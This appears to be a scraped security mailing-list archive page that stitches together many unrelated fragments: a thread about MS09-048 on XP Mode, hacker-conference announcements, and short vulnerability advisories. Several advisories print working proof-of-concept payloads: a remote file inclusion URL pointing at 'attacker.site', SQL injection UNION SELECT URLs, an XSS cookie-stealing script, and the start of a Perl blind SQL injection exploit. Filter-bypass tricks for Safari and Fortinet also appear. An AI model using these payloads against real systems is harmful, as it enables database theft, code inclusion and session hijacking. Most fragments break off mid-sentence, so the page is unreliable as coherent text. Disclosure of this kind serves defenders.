Re: [Full-disclosure] 3rd party patch for XP for MS09-048?

Thor (Hammer of God) wrote:
> Yeah, I know what it is and what it's for ;)  That was just my subtle way of trying to make a point.  To be more explicit:
>
> 1)  If you are publishing a vulnerability for which there is no patch, and for which you have no intention of making a patch, don't tell me it's mitigated by ancient, unusable default firewall settings, and don't withhold explicit details.  Say "THERE WILL BE NO PATCH, EVER.  HERE'S EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK."  Also, don't say 'you can deploy firewall settings via group policy to mitigate exposure' when the firewall obviously must be accepting network connections to get the settings in the first place.  If all it takes is any listening service, then you have issues.  It's like telling me that "the solution is to take the letter 'f' out of the word 'solution'."
>
> 2)  Think things through.  If you are going to try to boost sales of Win7 to corporate customers by providing free XP VM technology, and thus play up how important XP is and how many companies still depend upon it for business-critical application compatibility, don't deploy that technology in an other-than-default configuration that is subject to a DoS exploit while downplaying the extent to which the exploit may be leveraged by saying that a "typical" default configuration mitigates it, while choosing not to ever patch it.  Seems like simple logic points to me.
>
> t
>

RE: [Full-disclosure] 3rd party patch for XP for MS09-048?

Yeah, I know what it is and what it's for ;)  That was just my subtle way of trying to make a point.  To be more explicit:

1)  If you are publishing a vulnerability for which there is no patch, and for which you have no intention of making a patch, don't tell me it's mitigated by ancient, unusable default firewall settings, and don't withhold explicit details.  Say "THERE WILL BE NO PATCH, EVER.  HERE'S EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK."  Also, don't say 'you can deploy firewall settings via group policy to mitigate exposure' when the firewall obviously must be accepting network connections to get the settings in the first place.  If all it takes is any listening service, then you have issues.  It's like telling me that "the solution is to take the letter 'f' out of the word 'solution'."

2)  Think things through.  If you are going to try to boost sales of Win7 to corporate customers by providing free XP VM technology, and thus play up how important XP is and how many companies still depend upon it for business-critical application compatibility, don't deploy that technology in an other-than-default configuration that is subject to a DoS exploit while downplaying the extent to which the exploit may be leveraged by saying that a "typical" default configuration mitigates it, while choosing not to ever patch it.  Seems like simple logic points to me.

t

> -----Original Message-----
> From: Susan Bradley [mailto:sbradcpa@pacbell.net]

Black Hat November News: CFPS Now Open, Webinar 5 and Japan on-line.

Hello Bug Traq Readers, here are some updates on upcoming Black Hat
briefings as well as ways to get involved.

BLACK HAT FREE WEBINAR Nov 20th
https://www.blackhat.com/html/webinars/clickjacking.html

Black Hat Webcast #5 is scheduled for Thursday, November 20 at 1pm PST.  

Re: Re: Wrong report: BID 32287, Pi3Web ISAPI DoS vulnerability

Still wrong, no DoS. The server responds to further requests after the dialog box appears:
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /favicon.ico HTTP/1.1" 200 973
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET / HTTP/1.1" 200 2559
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Web_earth3.gif HTTP/1.1" 200 3811
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Web.ico HTTP/1.1" 200 973
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/red_ball.gif HTTP/1.1" 200 397
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Tile.gif HTTP/1.1" 200 1866


FortiGuard: URL Filtering Application Bypass Vulnerability

"Fortinet's URL blocking functionality can be bypassed by
specially-crafted HTTP requests that fulfill 3 factors:

1.- HTTP Requests are terminated by the CRLF characters.
2.- Forcing the use of HTTP/1.0 so that the Host header is not sent.
3.- Finally, by fragmenting the GET or POST requests.

Analysis:

Fortinet's past vulnerability
(http://www.fortiguardcenter.com/advisory/FGA-2006-10.html) said:

CORE-2011-0203 - MS HyperV Persistent DoS Vulnerability

When that pattern is located in the driver code, the entry of the
function 'memcpy' is patched in the import table, redirecting this
function call to the hook function 'handle', previously written by the
PoC code in kernel memory. Then, when 'memcpy' is called by the driver
to assemble the package to be sent to the hypervisor, the execution flow
will jump to the 'handle2' function (via the hook set by the 'handle'),
which is the function that receives the content of the argument passed
to 'memcpy' and turns a 'Simple' type packet into a 'GpaDirect' type
packet. All these steps are taken in order to trigger the vulnerability.


CORE-2011-0506 - Multiple Vulnerabilities in ManageEngine ServiceDesk Plus

The authentication process of ServiceDesk Plus obfuscates user passwords
using a trivial, symmetric algorithm in JavaScript code with no
secret.  Given that user passwords are stored locally in user cookies and
that the JavaScript code to encrypt and decrypt passwords is available in a .js
file, the authentication process of ServiceDesk Plus can be bypassed,
allowing an attacker to obtain the usernames and passwords of registered users.

Additionally, a cross site scripting vulnerability related to search
functions was found.



Vulnerabilities in 3S CoDeSys 3.4 SP4 Patch 2

1) Introduction
===============


From vendor's homepage:
"The CoDeSys Automation Suite is a comprehensive software tool for
industrial automation technology. All common automation tasks solved by
means of software can be realized with the CoDeSys Suite based on the
wide-spread controller and PLC development system of the same name."



Multiple vulnerabilities in Newscoop

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Newscoop, which can be exploited to perform Remote File Inclusion, SQL Injection and Cross-Site Scripting (XSS) attacks.


1) Multiple Remote File Inclusion in Newscoop: CVE-2012-1933

1.1 Input passed via the "GLOBALS[g_campsiteDir]" GET parameter to /include/phorum_load.php is not properly verified before being used in require_once() function and can be exploited to include arbitrary remote files.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/include/phorum_load.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00


Re: [Full-disclosure] 3rd party patch for XP for MS09-048?

It's XP.  Running in RDP mode.  It's got IE6, and wants antivirus.  Of
course it's vulnerable to any and all gobs of stuff out there.  But its
goal and intent is to allow small shops to deploy Win7.  If you need
more security, get appv/medv/whateverv or other virtualization.

It's not a security platform.  It's a get-the-stupid-16-bit-line-of-business-app-working platform.

Thor (Hammer of God) wrote:
> P.S.

(GET var 'member') BLIND SQL INJECTION EXPLOIT --FAMILY CONNECTIONS <= v1.9 -->

#!/usr/bin/perl
#--------------------------------------------------------------------------------
#(GET var 'member') BLIND SQL INJECTION EXPLOIT --FAMILY CONNECTIONS <= v1.9 -->
#--------------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://www.familycms.com/index.php
#-->DOWNLOAD: http://www.familycms.com/download.php
#-->DEMO: http://www.familycms.com/demo/index.php

MULTIPLE CODE INJECTION VULNERABILITIES --TUENTI--SPAIN-->

Go to --> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos


Vuln GET var --> 'cat_id'


Note: An XSS attack was not possible here.



MULTIPLE SQL INJECTION VULNERABILITIES --Flash Quiz Beta 2-->

-------------------
PROOFS OF CONCEPT:
-------------------


[++] GET var --> 'quiz'

[++] File vuln --> 'num_questions.php'


~~~~~> http://[HOST]/[PATH]/num_questions.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*

[DSECRG-08-037] Multiple Local File Include Vulnerabilities in Pluck CMS 4.5.2

Details
*******

1. Local File Include vulnerabilities found in script data/inc/themes/predefined_variables.php

Vulnerable GET parameters "blogpost", "cat" and "file".

First discovered by AmnPardaz Security Research Team [http://www.bugreport.ir/index_48.htm].
Vendor fixed the vulnerability in version 4.5.2 by blocking direct access to this file [http://www.pluck-cms.org/releasenotes.php#4.5.2].
However, an attacker can still exploit this vulnerability via the index.php file.


DEF CON 16 Retro Announcement! Back to Bang!

           We are proud to announce the 16th annual Def Con.

If you are at all familiar with any of the previous Cons, then you
will have a good idea of what DEF CON will be like. If you don't have any
experience with Cons, they are an event on the order of a pilgrimage to
Mecca for the underground. They are a mind-blowing orgy of information
exchange, viewpoints, speeches, education, enlightenment... And most of all
sheer, unchecked PARTYING. It is an event that you must experience at least
once in your lifetime.



HTB23008: Multiple XSS & CSRF (Cross-Site Request Forgery) in miniblog

Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in miniblog, which can be exploited to perform cross-site scripting & cross-site request forgery attacks.

1) Input passed via the GET "post_list" parameter to /adm/list.php is not properly sanitised before being returned to the user. 
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:

http://[host]/adm/list.php?post_list=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

TWSL2012-002: Multiple Vulnerabilities in WordPress

The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. This typically requires a user
to have valid MySQL credentials to complete.  However, a malicious user can
host their own MySQL database server and can successfully complete the
WordPress installation without having valid credentials on the target system.

After the successful installation of WordPress, a malicious user can inject
malicious PHP code via the WordPress Themes editor.  In addition, with control
of the database store, malicious Javascript can be injected into the content
of WordPress yielding persistent Cross Site Scripting.

ToorCamp 2012: The American Hacker Camp

TOORCAMP 2012

ToorCamp is a five-day open-air event for hackers, makers, breakers, and shakers. ToorCamp is where you get together with the rest of the best in a relaxing, beautiful atmosphere, and exchange ideas with the brightest technology experts from around the world. The camp has everything you need: power, internet, food and fun. Bring your tent, bring a friend – and get ready to reunite and reignite with really smart people, just like you.


GIVE A TALK

Want to share? We encourage you to submit a Talk or a Workshop idea to us. We are accepting 50-minute, 20-minute, and lightning talks as well as workshops of any length. For those that just want to work on a project with others, we are also providing resources for participants to organize hacking sessions. Talks can range from hacking and breaking new technologies to orienteering, philosophy, cooking, politics, etc. We will consider any talk that you think would be interesting for an intelligent audience of geeks like you.



AneCMS Multiple Vulnerabilities

- Vulnerability:
####################

+--> Local File Inclusion (LFI)
        AneCMS tries to locate local files to respond to users according to GET parameters. There are 25 affected
        files, but approximately all of them are protected except for the 'index.php' and 'rss.php' files. Check the
        exploits section for the details.

+--> Remote Code Execution

Safari browser port blocking bypassed by integer overflow

Apple is going to learn several lessons here, the most important of which is 
probably not to let an unsigned short pose as anything other than an unsigned 
short. Open up a Safari browser on your favorite chode-sniffing operating 
system. Go to a "banned" port like 25 and you'll get an error:

___Not allowed to use restricted network port___ (WebKitErrorDomain:103) 

Add 65536 to 25 to make 65561 and revisit the site on this new port -- no such
cockblocking. You're good to go. You can now use the Safari web browser as a

Re: All China, All The Time

> I could only imagine.  The other problem is that many people seem to think I'm saying something against
> the Chinese *people* themselves, based on the "f* you round-eye" messages I've received (and they call
> ME racist).  They don't seem to get the clear distinction (to me) between the Chinese people and China's
> network.  It's the machines I'm concerned with, the attacks coming from those machines.  Just because the
> machine is sourced in China doesn't mean the attacker is, so I have to do the best I can to defend against
> the machines.  However, that unfortunately comes across to those who choose not to think it through as me
> saying something against the Chinese themselves.

> Then again, as you well know, people will take any opportunity they can just to be ugly and confrontational,
> and to have something to rail about.  In the face of the reality of China's horribly infected network, when I

RE: Tests about semicolon zero-day (BID 37460)

post [1]:
(btw, that is the same question we are talking about on Twitter)
- Based on the blog post "Results of Investigation into Holiday IIS Claim"
(MSRC) [2], there is no vulnerability related to this case, right?  BUT... if a
user has a weak, guessable password, you can GUESS the user's
password and get the user's access, gaining all the privileges he/she has.

Okay, I know that there are a lot of best practices floating around, describing
many, many ways to force users to create a strong password instead... But
according to my experience in pen-tests, the easiest way to get system access
is guessing users' passwords.  RIGHT?

MULTIPLE REMOTE VULNERABILITIES --Small Pirates v-2.1-->

-------------------
PROOFS OF CONCEPT:
-------------------


[++] GET var --> 'id'

[++] File vuln --> 'pag1.php'


~~~~~> http://[HOST]/pag1.php?id=-1+UNION+ALL+SELECT+1,2,3,version(),5,6/*

Re: OpenID/Debian PRNG/DNS Cache poisoning advisory

> | > > effects but perhaps they can be made statistically very unlikely,
> | > > without blowing out the size of a browser.
> | > Why do you say a couple of megabytes? 99% of the value would be
> | > 1024-bit RSA keys. There are ~32,000 such keys. If you devote an
> | > 80-bit hash to each one (which is easily large enough to give you a
> | > vanishingly small false positive probability; you could probably get
> | > away with 64 bits), that's 320KB.  Given that the smallest Firefox
> | > [...]
> You can get by with a lot less than 64 bits.  People see problems like
> this and immediately think "birthday paradox", but there is no "birthday
> paradox" here:  You aren't looking for pairs in an ever-growing set,

PHP Live Helper <= 2.0.1 Multiple Vulnerabilities

There are a number of SQL Injection issues in PHP Live Helper
that allow for an attacker to have arbitrary access to database
contents such as administrator credentials. First, let's have a
look at global.php @ lines 51-60

function get ($table, $id, $from="id") {
        // $id and $from are interpolated into the query unescaped: this is the
        // SQL injection the advisory describes, shown as in the original source.
        $result=$this->DB_site->query_first("SELECT * FROM ".
        $this->dbprefix.$table." where ".$from."='$id'");
        if (is_array($result)) {
                foreach ($result as $key => $val) {
                        $info[$key] = stripslashes($val);
                }
                // closing braces and return added to complete the excerpt;
                // the original listing ends at line 60
                return $info;
        }
        return false;
}

CanSecWest 2008 PWN2OWN - Mar 26-28

Announcing CanSecWest PWN2OWN 2008.
===================================

Three targets, all patched.  All in typical client configurations with
typical user configurations.  You hack it, you get to keep it.

Each has a file on them and it contains the instructions and how to 
claim the prize.


Multiple vulnerabilities in Firefly Media Server (mt-daapd) 2.4.1 / SVN 1699

-----------------------------------------
A] partial directory traversal on Windows
-----------------------------------------

Using 3 dots in the HTTP query, it is possible to get a specific file in
the parent directory of the Firefly admin-root folder.
That means that an attacker can download the mt-daapd.conf file which
contains all the configuration of the server or other files like
firefly.log and so on.


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.